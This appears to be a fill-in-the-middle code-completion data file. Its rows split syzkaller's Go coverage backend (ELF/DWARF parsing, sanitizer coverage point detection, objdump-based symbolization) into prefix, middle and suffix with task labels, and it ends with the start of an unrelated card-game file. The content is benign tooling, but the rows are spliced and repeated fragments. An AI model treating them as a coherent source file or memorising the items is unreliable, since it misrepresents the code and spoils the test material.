}
colon := bytes.IndexByte(ln, ':')
if colon == -1 {
return 0
}
pc, err := strconv.ParseUint(string(ln[:colon]), 16, 64)
if err != nil {
return 0
}
return pc
}
func cleanPath(path, objDir, srcDir, buildDir string) (string, string) {
filename := ""
switch {
case strings.HasPrefix(path, objDir):
// Assume the file was built there.
path = strings.TrimPrefix(path, objDir)
filename = filepath.Join(objDir, path)
case strings.HasPrefix(path, buildDir):
// Assume the file was moved from buildDir to srcDir.
path = strings.TrimPrefix(path, buildDir)
filename = filepath.Join(srcDir, path)
default:
// Assume this is relative path.
filename = filepath.Join(srcDir, path)
}
return strings.TrimLeft(filepath.Clean(path), "/\\"), filename
}
func archCallInsn(target *targets.Target) ([][]byte, [][]byte) {
callName := [][]byte{[]byte(" <__sanitizer_cov_trace_pc>")}
switch target.Arch {
case targets.I386:
// c1000102: call c10001f0 <__sanitizer_cov_trace_pc>
return [][]byte{[]byte("\tcall ")}, callName
case targets.ARM64:
// ffff0000080d9cc0: bl ffff00000820f478 <__sanitizer_cov_trace_pc>
return [][]byte{[]byte("\tbl\t")}, callName
case targets.ARM:
// 8010252c: bl 801c3280 <__sanitizer_cov_trace_pc>
return [][]byte{[]byte("\tbl\t")}, callName
case targets.PPC64LE:
// c00000000006d904: bl c000000000350780 <.__sanitizer_cov_trace_pc>
// This is only known to occur in the test:
// 838: bl 824 <__sanitizer_cov_trace_pc+0x8>
// This occurs on PPC64LE:
// c0000000001c21a8: bl c0000000002df4a0 <__sanitizer_cov_trace_pc>
return [][]byte{[]byte("\tbl ")}, [][]byte{
[]byte("<__sanitizer_cov_trace_pc>"),
[]byte("<__sanitizer_cov_trace_pc+0x8>"),
[]byte(" <.__sanitizer_cov_trace_pc>"),
}
case targets.MIPS64LE:
// ffffffff80100420: jal ffffffff80205880 <__sanitizer_cov_trace_pc>
// This is only known to occur in the test:
// b58: bal b30 <__sanitizer_cov_trace_pc>
return [][]byte{[]byte("\tjal\t"), []byte("\tbal\t")}, callName
case targets.S390x:
// 1001de: brasl %r14,2bc090 <__sanitizer_cov_trace_pc>
return [][]byte{[]byte("\tbrasl\t")}, callName
case targets.RiscV64:
// ffffffe000200018: jal ra,ffffffe0002935b0 <__sanitizer_cov_trace_pc>
// ffffffe0000010da: jalr 1242(ra) # ffffffe0002935b0 <__sanitizer_cov_trace_pc>
return [][]byte{[]byte("\tjal\t"), []byte("\tjalr\t")}, callName
default:
panic(fmt.Sprintf("unknown arch %q", target.Arch))
}
}
| symbolize | identifier_name |
elf.go | // Copyright 2020 syzkaller project authors. All rights reserved.
// Use of this source code is governed by Apache 2 LICENSE that can be found in the LICENSE file.
package backend
import (
"bufio"
"bytes"
"debug/dwarf"
"debug/elf"
"encoding/binary"
"fmt"
"io/ioutil"
"path/filepath"
"runtime"
"sort"
"strconv"
"strings"
"github.com/google/syzkaller/pkg/osutil"
"github.com/google/syzkaller/pkg/symbolizer"
"github.com/google/syzkaller/sys/targets"
)
func makeELF(target *targets.Target, objDir, srcDir, buildDir string) (*Impl, error) {
kernelObject := filepath.Join(objDir, target.KernelObject)
file, err := elf.Open(kernelObject)
if err != nil {
return nil, err
}
// Here and below index 0 refers to coverage callbacks (__sanitizer_cov_trace_pc)
// and index 1 refers to comparison callbacks (__sanitizer_cov_trace_cmp*).
var coverPoints [2][]uint64
var symbols []*Symbol
var textAddr uint64
errc := make(chan error, 1)
go func() {
symbols1, textAddr1, tracePC, traceCmp, err := readSymbols(file)
if err != nil {
errc <- err
return
}
symbols, textAddr = symbols1, textAddr1
if target.OS == targets.FreeBSD {
// On FreeBSD .text address in ELF is 0, but .text is actually mapped at 0xffffffff.
textAddr = ^uint64(0)
}
if target.Arch == targets.AMD64 {
coverPoints, err = readCoverPoints(file, tracePC, traceCmp)
} else {
coverPoints, err = objdump(target, kernelObject)
}
errc <- err
}()
ranges, units, err := readTextRanges(file)
if err != nil {
return nil, err
}
if err := <-errc; err != nil {
return nil, err
}
if len(coverPoints[0]) == 0 {
return nil, fmt.Errorf("%v doesn't contain coverage callbacks (set CONFIG_KCOV=y)", kernelObject)
}
symbols = buildSymbols(symbols, ranges, coverPoints)
nunit := 0
for _, unit := range units {
if len(unit.PCs) == 0 {
continue // drop the unit
}
unit.Name, unit.Path = cleanPath(unit.Name, objDir, srcDir, buildDir)
units[nunit] = unit
nunit++
}
units = units[:nunit]
if len(symbols) == 0 || len(units) == 0 {
return nil, fmt.Errorf("failed to parse DWARF (set CONFIG_DEBUG_INFO=y?)")
}
impl := &Impl{
Units: units,
Symbols: symbols,
Symbolize: func(pcs []uint64) ([]Frame, error) {
return symbolize(target, objDir, srcDir, buildDir, kernelObject, pcs)
},
RestorePC: func(pc uint32) uint64 {
return PreviousInstructionPC(target, RestorePC(pc, uint32(textAddr>>32)))
},
}
return impl, nil
}
type pcRange struct {
start uint64
end uint64
unit *CompileUnit
}
func buildSymbols(symbols []*Symbol, ranges []pcRange, coverPoints [2][]uint64) []*Symbol {
// Assign coverage point PCs to symbols.
// Both symbols and coverage points are sorted, so we do it one pass over both.
selectPCs := func(u *ObjectUnit, typ int) *[]uint64 {
return [2]*[]uint64{&u.PCs, &u.CMPs}[typ]
}
for pcType := range coverPoints {
pcs := coverPoints[pcType]
var curSymbol *Symbol
firstSymbolPC, symbolIdx := -1, 0
for i := 0; i < len(pcs); i++ {
pc := pcs[i]
for ; symbolIdx < len(symbols) && pc >= symbols[symbolIdx].End; symbolIdx++ {
}
var symb *Symbol
if symbolIdx < len(symbols) && pc >= symbols[symbolIdx].Start && pc < symbols[symbolIdx].End {
symb = symbols[symbolIdx]
}
if curSymbol != nil && curSymbol != symb {
*selectPCs(&curSymbol.ObjectUnit, pcType) = pcs[firstSymbolPC:i]
firstSymbolPC = -1
}
curSymbol = symb
if symb != nil && firstSymbolPC == -1 {
firstSymbolPC = i
}
}
if curSymbol != nil {
*selectPCs(&curSymbol.ObjectUnit, pcType) = pcs[firstSymbolPC:]
}
}
// Assign compile units to symbols based on unit pc ranges.
// Do it one pass as both are sorted.
nsymbol := 0
rangeIndex := 0
for _, s := range symbols {
for ; rangeIndex < len(ranges) && ranges[rangeIndex].end <= s.Start; rangeIndex++ {
}
if rangeIndex == len(ranges) || s.Start < ranges[rangeIndex].start || len(s.PCs) == 0 {
continue // drop the symbol
}
unit := ranges[rangeIndex].unit
s.Unit = unit
symbols[nsymbol] = s
nsymbol++
}
symbols = symbols[:nsymbol]
for pcType := range coverPoints {
for _, s := range symbols {
symbPCs := selectPCs(&s.ObjectUnit, pcType)
unitPCs := selectPCs(&s.Unit.ObjectUnit, pcType)
pos := len(*unitPCs)
*unitPCs = append(*unitPCs, *symbPCs...)
*symbPCs = (*unitPCs)[pos:]
}
}
return symbols
}
func readSymbols(file *elf.File) ([]*Symbol, uint64, uint64, map[uint64]bool, error) {
text := file.Section(".text")
if text == nil {
return nil, 0, 0, nil, fmt.Errorf("no .text section in the object file")
}
allSymbols, err := file.Symbols()
if err != nil {
return nil, 0, 0, nil, fmt.Errorf("failed to read ELF symbols: %v", err)
}
traceCmp := make(map[uint64]bool)
var tracePC uint64
var symbols []*Symbol
for _, symb := range allSymbols {
if symb.Value < text.Addr || symb.Value+symb.Size > text.Addr+text.Size {
continue
}
symbols = append(symbols, &Symbol{
ObjectUnit: ObjectUnit{
Name: symb.Name,
},
Start: symb.Value,
End: symb.Value + symb.Size,
})
if strings.HasPrefix(symb.Name, "__sanitizer_cov_trace_") {
if symb.Name == "__sanitizer_cov_trace_pc" {
tracePC = symb.Value
} else {
traceCmp[symb.Value] = true
}
}
}
if tracePC == 0 {
return nil, 0, 0, nil, fmt.Errorf("no __sanitizer_cov_trace_pc symbol in the object file")
}
sort.Slice(symbols, func(i, j int) bool {
return symbols[i].Start < symbols[j].Start
})
return symbols, text.Addr, tracePC, traceCmp, nil
}
func readTextRanges(file *elf.File) ([]pcRange, []*CompileUnit, error) {
text := file.Section(".text")
if text == nil {
return nil, nil, fmt.Errorf("no .text section in the object file")
}
kaslr := file.Section(".rela.text") != nil
debugInfo, err := file.DWARF()
if err != nil {
return nil, nil, fmt.Errorf("failed to parse DWARF: %v (set CONFIG_DEBUG_INFO=y?)", err)
}
var ranges []pcRange
var units []*CompileUnit
for r := debugInfo.Reader(); ; {
ent, err := r.Next()
if err != nil {
return nil, nil, err
}
if ent == nil {
break
}
if ent.Tag != dwarf.TagCompileUnit {
return nil, nil, fmt.Errorf("found unexpected tag %v on top level", ent.Tag)
}
attrName := ent.Val(dwarf.AttrName)
if attrName == nil {
continue
}
unit := &CompileUnit{
ObjectUnit: ObjectUnit{
Name: attrName.(string),
},
}
units = append(units, unit)
ranges1, err := debugInfo.Ranges(ent)
if err != nil {
return nil, nil, err
}
for _, r := range ranges1 {
if r[0] >= r[1] || r[0] < text.Addr || r[1] > text.Addr+text.Size {
if kaslr {
// Linux kernel binaries with CONFIG_RANDOMIZE_BASE=y are strange.
// .text starts at 0xffffffff81000000 and symbols point there as well,
// but PC ranges point to addresses around 0.
// So try to add text offset and retry the check.
// It's unclear if we also need some offset on top of text.Addr,
// it gives approximately correct addresses, but not necessary precisely
// correct addresses.
r[0] += text.Addr
r[1] += text.Addr
if r[0] >= r[1] || r[0] < text.Addr || r[1] > text.Addr+text.Size {
continue
}
}
}
ranges = append(ranges, pcRange{r[0], r[1], unit})
}
r.SkipChildren()
}
sort.Slice(ranges, func(i, j int) bool {
return ranges[i].start < ranges[j].start
})
return ranges, units, nil
}
func symbolize(target *targets.Target, objDir, srcDir, buildDir, obj string, pcs []uint64) ([]Frame, error) |
// readCoverPoints finds all coverage points (calls of __sanitizer_cov_trace_pc) in the object file.
// Currently it is amd64-specific: looks for e8 opcode and correct offset.
// Running objdump on the whole object file is too slow.
func readCoverPoints(file *elf.File, tracePC uint64, traceCmp map[uint64]bool) ([2][]uint64, error) {
var pcs [2][]uint64
text := file.Section(".text")
if text == nil {
return pcs, fmt.Errorf("no .text section in the object file")
}
data, err := text.Data()
if err != nil {
return pcs, fmt.Errorf("failed to read .text: %v", err)
}
const callLen = 5
end := len(data) - callLen + 1
for i := 0; i < end; i++ {
pos := bytes.IndexByte(data[i:end], 0xe8)
if pos == -1 {
break
}
pos += i
i = pos
off := uint64(int64(int32(binary.LittleEndian.Uint32(data[pos+1:]))))
pc := text.Addr + uint64(pos)
target := pc + off + callLen
if target == tracePC {
pcs[0] = append(pcs[0], pc)
} else if traceCmp[target] {
pcs[1] = append(pcs[1], pc)
}
}
return pcs, nil
}
// objdump is an old, slow way of finding coverage points.
// amd64 uses faster option of parsing binary directly (readCoverPoints).
// TODO: use the faster approach for all other arches and drop this.
func objdump(target *targets.Target, obj string) ([2][]uint64, error) {
var pcs [2][]uint64
cmd := osutil.Command(target.Objdump, "-d", "--no-show-raw-insn", obj)
stdout, err := cmd.StdoutPipe()
if err != nil {
return pcs, err
}
defer stdout.Close()
stderr, err := cmd.StderrPipe()
if err != nil {
return pcs, err
}
defer stderr.Close()
if err := cmd.Start(); err != nil {
return pcs, fmt.Errorf("failed to run objdump on %v: %v", obj, err)
}
defer func() {
cmd.Process.Kill()
cmd.Wait()
}()
s := bufio.NewScanner(stdout)
callInsns, traceFuncs := archCallInsn(target)
for s.Scan() {
if pc := parseLine(callInsns, traceFuncs, s.Bytes()); pc != 0 {
pcs[0] = append(pcs[0], pc)
}
}
stderrOut, _ := ioutil.ReadAll(stderr)
if err := cmd.Wait(); err != nil {
return pcs, fmt.Errorf("failed to run objdump on %v: %v\n%s", obj, err, stderrOut)
}
if err := s.Err(); err != nil {
return pcs, fmt.Errorf("failed to run objdump on %v: %v\n%s", obj, err, stderrOut)
}
return pcs, nil
}
func parseLine(callInsns, traceFuncs [][]byte, ln []byte) uint64 {
pos := -1
for _, callInsn := range callInsns {
if pos = bytes.Index(ln, callInsn); pos != -1 {
break
}
}
if pos == -1 {
return 0
}
hasCall := false
for _, traceFunc := range traceFuncs {
if hasCall = bytes.Contains(ln[pos:], traceFunc); hasCall {
break
}
}
if !hasCall {
return 0
}
for len(ln) != 0 && ln[0] == ' ' {
ln = ln[1:]
}
colon := bytes.IndexByte(ln, ':')
if colon == -1 {
return 0
}
pc, err := strconv.ParseUint(string(ln[:colon]), 16, 64)
if err != nil {
return 0
}
return pc
}
func cleanPath(path, objDir, srcDir, buildDir string) (string, string) {
filename := ""
switch {
case strings.HasPrefix(path, objDir):
// Assume the file was built there.
path = strings.TrimPrefix(path, objDir)
filename = filepath.Join(objDir, path)
case strings.HasPrefix(path, buildDir):
// Assume the file was moved from buildDir to srcDir.
path = strings.TrimPrefix(path, buildDir)
filename = filepath.Join(srcDir, path)
default:
// Assume this is relative path.
filename = filepath.Join(srcDir, path)
}
return strings.TrimLeft(filepath.Clean(path), "/\\"), filename
}
func archCallInsn(target *targets.Target) ([][]byte, [][]byte) {
callName := [][]byte{[]byte(" <__sanitizer_cov_trace_pc>")}
switch target.Arch {
case targets.I386:
// c1000102: call c10001f0 <__sanitizer_cov_trace_pc>
return [][]byte{[]byte("\tcall ")}, callName
case targets.ARM64:
// ffff0000080d9cc0: bl ffff00000820f478 <__sanitizer_cov_trace_pc>
return [][]byte{[]byte("\tbl\t")}, callName
case targets.ARM:
// 8010252c: bl 801c3280 <__sanitizer_cov_trace_pc>
return [][]byte{[]byte("\tbl\t")}, callName
case targets.PPC64LE:
// c00000000006d904: bl c000000000350780 <.__sanitizer_cov_trace_pc>
// This is only known to occur in the test:
// 838: bl 824 <__sanitizer_cov_trace_pc+0x8>
// This occurs on PPC64LE:
// c0000000001c21a8: bl c0000000002df4a0 <__sanitizer_cov_trace_pc>
return [][]byte{[]byte("\tbl ")}, [][]byte{
[]byte("<__sanitizer_cov_trace_pc>"),
[]byte("<__sanitizer_cov_trace_pc+0x8>"),
[]byte(" <.__sanitizer_cov_trace_pc>"),
}
case targets.MIPS64LE:
// ffffffff80100420: jal ffffffff80205880 <__sanitizer_cov_trace_pc>
// This is only known to occur in the test:
// b58: bal b30 <__sanitizer_cov_trace_pc>
return [][]byte{[]byte("\tjal\t"), []byte("\tbal\t")}, callName
case targets.S390x:
// 1001de: brasl %r14,2bc090 <__sanitizer_cov_trace_pc>
return [][]byte{[]byte("\tbrasl\t")}, callName
case targets.RiscV64:
// ffffffe000200018: jal ra,ffffffe0002935b0 <__sanitizer_cov_trace_pc>
// ffffffe0000010da: jalr 1242(ra) # ffffffe0002935b0 <__sanitizer_cov_trace_pc>
return [][]byte{[]byte("\tjal\t"), []byte("\tjalr\t")}, callName
default:
panic(fmt.Sprintf("unknown arch %q", target.Arch))
}
}
| {
procs := runtime.GOMAXPROCS(0) / 2
if need := len(pcs) / 1000; procs > need {
procs = need
}
const (
minProcs = 1
maxProcs = 4
)
// addr2line on a beefy vmlinux takes up to 1.6GB of RAM, so don't create too many of them.
if procs > maxProcs {
procs = maxProcs
}
if procs < minProcs {
procs = minProcs
}
type symbolizerResult struct {
frames []symbolizer.Frame
err error
}
symbolizerC := make(chan symbolizerResult, procs)
pcchan := make(chan []uint64, procs)
for p := 0; p < procs; p++ {
go func() {
symb := symbolizer.NewSymbolizer(target)
defer symb.Close()
var res symbolizerResult
for pcs := range pcchan {
frames, err := symb.SymbolizeArray(obj, pcs)
if err != nil {
res.err = fmt.Errorf("failed to symbolize: %v", err)
}
res.frames = append(res.frames, frames...)
}
symbolizerC <- res
}()
}
for i := 0; i < len(pcs); {
end := i + 100
if end > len(pcs) {
end = len(pcs)
}
pcchan <- pcs[i:end]
i = end
}
close(pcchan)
var err0 error
var frames []Frame
for p := 0; p < procs; p++ {
res := <-symbolizerC
if res.err != nil {
err0 = res.err
}
for _, frame := range res.frames {
name, path := cleanPath(frame.File, objDir, srcDir, buildDir)
frames = append(frames, Frame{
PC: frame.PC,
Name: name,
Path: path,
Range: Range{
StartLine: frame.Line,
StartCol: 0,
EndLine: frame.Line,
EndCol: LineEnd,
},
})
}
}
if err0 != nil {
return nil, err0
}
return frames, nil
} | identifier_body |
elf.go | // Copyright 2020 syzkaller project authors. All rights reserved.
// Use of this source code is governed by Apache 2 LICENSE that can be found in the LICENSE file.
package backend
import (
"bufio"
"bytes"
"debug/dwarf"
"debug/elf"
"encoding/binary"
"fmt"
"io/ioutil"
"path/filepath"
"runtime"
"sort"
"strconv"
"strings"
"github.com/google/syzkaller/pkg/osutil"
"github.com/google/syzkaller/pkg/symbolizer"
"github.com/google/syzkaller/sys/targets"
)
func makeELF(target *targets.Target, objDir, srcDir, buildDir string) (*Impl, error) {
kernelObject := filepath.Join(objDir, target.KernelObject)
file, err := elf.Open(kernelObject)
if err != nil {
return nil, err
}
// Here and below index 0 refers to coverage callbacks (__sanitizer_cov_trace_pc)
// and index 1 refers to comparison callbacks (__sanitizer_cov_trace_cmp*).
var coverPoints [2][]uint64
var symbols []*Symbol
var textAddr uint64
errc := make(chan error, 1)
go func() {
symbols1, textAddr1, tracePC, traceCmp, err := readSymbols(file)
if err != nil {
errc <- err
return
}
symbols, textAddr = symbols1, textAddr1
if target.OS == targets.FreeBSD {
// On FreeBSD .text address in ELF is 0, but .text is actually mapped at 0xffffffff.
textAddr = ^uint64(0)
}
if target.Arch == targets.AMD64 {
coverPoints, err = readCoverPoints(file, tracePC, traceCmp)
} else {
coverPoints, err = objdump(target, kernelObject)
}
errc <- err
}()
ranges, units, err := readTextRanges(file)
if err != nil {
return nil, err
}
if err := <-errc; err != nil {
return nil, err
}
if len(coverPoints[0]) == 0 {
return nil, fmt.Errorf("%v doesn't contain coverage callbacks (set CONFIG_KCOV=y)", kernelObject)
}
symbols = buildSymbols(symbols, ranges, coverPoints)
nunit := 0
for _, unit := range units {
if len(unit.PCs) == 0 {
continue // drop the unit
}
unit.Name, unit.Path = cleanPath(unit.Name, objDir, srcDir, buildDir)
units[nunit] = unit
nunit++
}
units = units[:nunit]
if len(symbols) == 0 || len(units) == 0 {
return nil, fmt.Errorf("failed to parse DWARF (set CONFIG_DEBUG_INFO=y?)")
}
impl := &Impl{
Units: units,
Symbols: symbols,
Symbolize: func(pcs []uint64) ([]Frame, error) {
return symbolize(target, objDir, srcDir, buildDir, kernelObject, pcs)
},
RestorePC: func(pc uint32) uint64 {
return PreviousInstructionPC(target, RestorePC(pc, uint32(textAddr>>32)))
},
}
return impl, nil
}
type pcRange struct {
start uint64
end uint64
unit *CompileUnit
}
func buildSymbols(symbols []*Symbol, ranges []pcRange, coverPoints [2][]uint64) []*Symbol {
// Assign coverage point PCs to symbols.
// Both symbols and coverage points are sorted, so we do it one pass over both.
selectPCs := func(u *ObjectUnit, typ int) *[]uint64 {
return [2]*[]uint64{&u.PCs, &u.CMPs}[typ]
}
for pcType := range coverPoints {
pcs := coverPoints[pcType]
var curSymbol *Symbol
firstSymbolPC, symbolIdx := -1, 0
for i := 0; i < len(pcs); i++ {
pc := pcs[i]
for ; symbolIdx < len(symbols) && pc >= symbols[symbolIdx].End; symbolIdx++ {
}
var symb *Symbol
if symbolIdx < len(symbols) && pc >= symbols[symbolIdx].Start && pc < symbols[symbolIdx].End {
symb = symbols[symbolIdx]
}
if curSymbol != nil && curSymbol != symb {
*selectPCs(&curSymbol.ObjectUnit, pcType) = pcs[firstSymbolPC:i]
firstSymbolPC = -1
}
curSymbol = symb
if symb != nil && firstSymbolPC == -1 {
firstSymbolPC = i
}
}
if curSymbol != nil {
*selectPCs(&curSymbol.ObjectUnit, pcType) = pcs[firstSymbolPC:]
}
}
// Assign compile units to symbols based on unit pc ranges.
// Do it one pass as both are sorted.
nsymbol := 0
rangeIndex := 0
for _, s := range symbols {
for ; rangeIndex < len(ranges) && ranges[rangeIndex].end <= s.Start; rangeIndex++ {
}
if rangeIndex == len(ranges) || s.Start < ranges[rangeIndex].start || len(s.PCs) == 0 {
continue // drop the symbol
}
unit := ranges[rangeIndex].unit
s.Unit = unit
symbols[nsymbol] = s
nsymbol++
}
symbols = symbols[:nsymbol]
for pcType := range coverPoints {
for _, s := range symbols {
symbPCs := selectPCs(&s.ObjectUnit, pcType)
unitPCs := selectPCs(&s.Unit.ObjectUnit, pcType)
pos := len(*unitPCs)
*unitPCs = append(*unitPCs, *symbPCs...)
*symbPCs = (*unitPCs)[pos:]
}
}
return symbols
}
func readSymbols(file *elf.File) ([]*Symbol, uint64, uint64, map[uint64]bool, error) {
text := file.Section(".text")
if text == nil {
return nil, 0, 0, nil, fmt.Errorf("no .text section in the object file")
}
allSymbols, err := file.Symbols()
if err != nil {
return nil, 0, 0, nil, fmt.Errorf("failed to read ELF symbols: %v", err)
}
traceCmp := make(map[uint64]bool)
var tracePC uint64
var symbols []*Symbol
for _, symb := range allSymbols {
if symb.Value < text.Addr || symb.Value+symb.Size > text.Addr+text.Size {
continue
}
symbols = append(symbols, &Symbol{
ObjectUnit: ObjectUnit{
Name: symb.Name,
},
Start: symb.Value,
End: symb.Value + symb.Size,
})
if strings.HasPrefix(symb.Name, "__sanitizer_cov_trace_") {
if symb.Name == "__sanitizer_cov_trace_pc" {
tracePC = symb.Value
} else {
traceCmp[symb.Value] = true
}
}
}
if tracePC == 0 {
return nil, 0, 0, nil, fmt.Errorf("no __sanitizer_cov_trace_pc symbol in the object file")
}
sort.Slice(symbols, func(i, j int) bool {
return symbols[i].Start < symbols[j].Start
})
return symbols, text.Addr, tracePC, traceCmp, nil
}
func readTextRanges(file *elf.File) ([]pcRange, []*CompileUnit, error) {
text := file.Section(".text")
if text == nil {
return nil, nil, fmt.Errorf("no .text section in the object file")
}
kaslr := file.Section(".rela.text") != nil
debugInfo, err := file.DWARF()
if err != nil {
return nil, nil, fmt.Errorf("failed to parse DWARF: %v (set CONFIG_DEBUG_INFO=y?)", err)
}
var ranges []pcRange
var units []*CompileUnit
for r := debugInfo.Reader(); ; {
ent, err := r.Next()
if err != nil {
return nil, nil, err
}
if ent == nil {
break
}
if ent.Tag != dwarf.TagCompileUnit {
return nil, nil, fmt.Errorf("found unexpected tag %v on top level", ent.Tag)
}
attrName := ent.Val(dwarf.AttrName)
if attrName == nil {
continue
}
unit := &CompileUnit{
ObjectUnit: ObjectUnit{
Name: attrName.(string),
},
}
units = append(units, unit)
ranges1, err := debugInfo.Ranges(ent)
if err != nil {
return nil, nil, err
}
for _, r := range ranges1 {
if r[0] >= r[1] || r[0] < text.Addr || r[1] > text.Addr+text.Size {
if kaslr {
// Linux kernel binaries with CONFIG_RANDOMIZE_BASE=y are strange.
// .text starts at 0xffffffff81000000 and symbols point there as well,
// but PC ranges point to addresses around 0.
// So try to add text offset and retry the check.
// It's unclear if we also need some offset on top of text.Addr,
// it gives approximately correct addresses, but not necessary precisely
// correct addresses.
r[0] += text.Addr
r[1] += text.Addr
if r[0] >= r[1] || r[0] < text.Addr || r[1] > text.Addr+text.Size {
continue
}
}
}
ranges = append(ranges, pcRange{r[0], r[1], unit})
}
r.SkipChildren()
}
sort.Slice(ranges, func(i, j int) bool {
return ranges[i].start < ranges[j].start
})
return ranges, units, nil
}
func symbolize(target *targets.Target, objDir, srcDir, buildDir, obj string, pcs []uint64) ([]Frame, error) {
procs := runtime.GOMAXPROCS(0) / 2
if need := len(pcs) / 1000; procs > need {
procs = need
}
const (
minProcs = 1
maxProcs = 4
)
// addr2line on a beefy vmlinux takes up to 1.6GB of RAM, so don't create too many of them.
if procs > maxProcs {
procs = maxProcs
}
if procs < minProcs {
procs = minProcs
}
type symbolizerResult struct {
frames []symbolizer.Frame
err error
}
symbolizerC := make(chan symbolizerResult, procs)
pcchan := make(chan []uint64, procs)
for p := 0; p < procs; p++ {
go func() {
symb := symbolizer.NewSymbolizer(target)
defer symb.Close()
var res symbolizerResult
for pcs := range pcchan {
frames, err := symb.SymbolizeArray(obj, pcs)
if err != nil {
res.err = fmt.Errorf("failed to symbolize: %v", err)
}
res.frames = append(res.frames, frames...)
}
symbolizerC <- res
}()
}
for i := 0; i < len(pcs); {
end := i + 100
if end > len(pcs) {
end = len(pcs)
}
pcchan <- pcs[i:end]
i = end
}
close(pcchan)
var err0 error
var frames []Frame
for p := 0; p < procs; p++ {
res := <-symbolizerC
if res.err != nil {
err0 = res.err
}
for _, frame := range res.frames {
name, path := cleanPath(frame.File, objDir, srcDir, buildDir)
frames = append(frames, Frame{
PC: frame.PC,
Name: name,
Path: path,
Range: Range{
StartLine: frame.Line,
StartCol: 0,
EndLine: frame.Line,
EndCol: LineEnd,
},
})
}
}
if err0 != nil {
return nil, err0
}
return frames, nil
}
// readCoverPoints finds all coverage points (calls of __sanitizer_cov_trace_pc) in the object file.
// Currently it is amd64-specific: looks for e8 opcode and correct offset.
// Running objdump on the whole object file is too slow.
func readCoverPoints(file *elf.File, tracePC uint64, traceCmp map[uint64]bool) ([2][]uint64, error) {
var pcs [2][]uint64
text := file.Section(".text")
if text == nil {
return pcs, fmt.Errorf("no .text section in the object file")
}
data, err := text.Data()
if err != nil {
return pcs, fmt.Errorf("failed to read .text: %v", err)
}
const callLen = 5
end := len(data) - callLen + 1
for i := 0; i < end; i++ {
pos := bytes.IndexByte(data[i:end], 0xe8)
if pos == -1 |
pos += i
i = pos
off := uint64(int64(int32(binary.LittleEndian.Uint32(data[pos+1:]))))
pc := text.Addr + uint64(pos)
target := pc + off + callLen
if target == tracePC {
pcs[0] = append(pcs[0], pc)
} else if traceCmp[target] {
pcs[1] = append(pcs[1], pc)
}
}
return pcs, nil
}
// objdump is an old, slow way of finding coverage points.
// amd64 uses faster option of parsing binary directly (readCoverPoints).
// TODO: use the faster approach for all other arches and drop this.
func objdump(target *targets.Target, obj string) ([2][]uint64, error) {
var pcs [2][]uint64
cmd := osutil.Command(target.Objdump, "-d", "--no-show-raw-insn", obj)
stdout, err := cmd.StdoutPipe()
if err != nil {
return pcs, err
}
defer stdout.Close()
stderr, err := cmd.StderrPipe()
if err != nil {
return pcs, err
}
defer stderr.Close()
if err := cmd.Start(); err != nil {
return pcs, fmt.Errorf("failed to run objdump on %v: %v", obj, err)
}
defer func() {
cmd.Process.Kill()
cmd.Wait()
}()
s := bufio.NewScanner(stdout)
callInsns, traceFuncs := archCallInsn(target)
for s.Scan() {
if pc := parseLine(callInsns, traceFuncs, s.Bytes()); pc != 0 {
pcs[0] = append(pcs[0], pc)
}
}
stderrOut, _ := ioutil.ReadAll(stderr)
if err := cmd.Wait(); err != nil {
return pcs, fmt.Errorf("failed to run objdump on %v: %v\n%s", obj, err, stderrOut)
}
if err := s.Err(); err != nil {
return pcs, fmt.Errorf("failed to run objdump on %v: %v\n%s", obj, err, stderrOut)
}
return pcs, nil
}
func parseLine(callInsns, traceFuncs [][]byte, ln []byte) uint64 {
pos := -1
for _, callInsn := range callInsns {
if pos = bytes.Index(ln, callInsn); pos != -1 {
break
}
}
if pos == -1 {
return 0
}
hasCall := false
for _, traceFunc := range traceFuncs {
if hasCall = bytes.Contains(ln[pos:], traceFunc); hasCall {
break
}
}
if !hasCall {
return 0
}
for len(ln) != 0 && ln[0] == ' ' {
ln = ln[1:]
}
colon := bytes.IndexByte(ln, ':')
if colon == -1 {
return 0
}
pc, err := strconv.ParseUint(string(ln[:colon]), 16, 64)
if err != nil {
return 0
}
return pc
}
func cleanPath(path, objDir, srcDir, buildDir string) (string, string) {
filename := ""
switch {
case strings.HasPrefix(path, objDir):
// Assume the file was built there.
path = strings.TrimPrefix(path, objDir)
filename = filepath.Join(objDir, path)
case strings.HasPrefix(path, buildDir):
// Assume the file was moved from buildDir to srcDir.
path = strings.TrimPrefix(path, buildDir)
filename = filepath.Join(srcDir, path)
default:
// Assume this is relative path.
filename = filepath.Join(srcDir, path)
}
return strings.TrimLeft(filepath.Clean(path), "/\\"), filename
}
func archCallInsn(target *targets.Target) ([][]byte, [][]byte) {
callName := [][]byte{[]byte(" <__sanitizer_cov_trace_pc>")}
switch target.Arch {
case targets.I386:
// c1000102: call c10001f0 <__sanitizer_cov_trace_pc>
return [][]byte{[]byte("\tcall ")}, callName
case targets.ARM64:
// ffff0000080d9cc0: bl ffff00000820f478 <__sanitizer_cov_trace_pc>
return [][]byte{[]byte("\tbl\t")}, callName
case targets.ARM:
// 8010252c: bl 801c3280 <__sanitizer_cov_trace_pc>
return [][]byte{[]byte("\tbl\t")}, callName
case targets.PPC64LE:
// c00000000006d904: bl c000000000350780 <.__sanitizer_cov_trace_pc>
// This is only known to occur in the test:
// 838: bl 824 <__sanitizer_cov_trace_pc+0x8>
// This occurs on PPC64LE:
// c0000000001c21a8: bl c0000000002df4a0 <__sanitizer_cov_trace_pc>
return [][]byte{[]byte("\tbl ")}, [][]byte{
[]byte("<__sanitizer_cov_trace_pc>"),
[]byte("<__sanitizer_cov_trace_pc+0x8>"),
[]byte(" <.__sanitizer_cov_trace_pc>"),
}
case targets.MIPS64LE:
// ffffffff80100420: jal ffffffff80205880 <__sanitizer_cov_trace_pc>
// This is only known to occur in the test:
// b58: bal b30 <__sanitizer_cov_trace_pc>
return [][]byte{[]byte("\tjal\t"), []byte("\tbal\t")}, callName
case targets.S390x:
// 1001de: brasl %r14,2bc090 <__sanitizer_cov_trace_pc>
return [][]byte{[]byte("\tbrasl\t")}, callName
case targets.RiscV64:
// ffffffe000200018: jal ra,ffffffe0002935b0 <__sanitizer_cov_trace_pc>
// ffffffe0000010da: jalr 1242(ra) # ffffffe0002935b0 <__sanitizer_cov_trace_pc>
return [][]byte{[]byte("\tjal\t"), []byte("\tjalr\t")}, callName
default:
panic(fmt.Sprintf("unknown arch %q", target.Arch))
}
}
| {
break
} | conditional_block |
warwick.go | /*
You are building a medieval village. You win by having the most Victory Points (VP), which you get by building
particular buildings. You build by discarding cards. The game is over when one player has built one
of each kind of building (and his opponent gets one more turn), or when the deck runs out.
Buildings:
There are 9 different kinds of building: Civic, Defensive, School, Military, Manufacturing, Supply, Market, Farm and Storage.
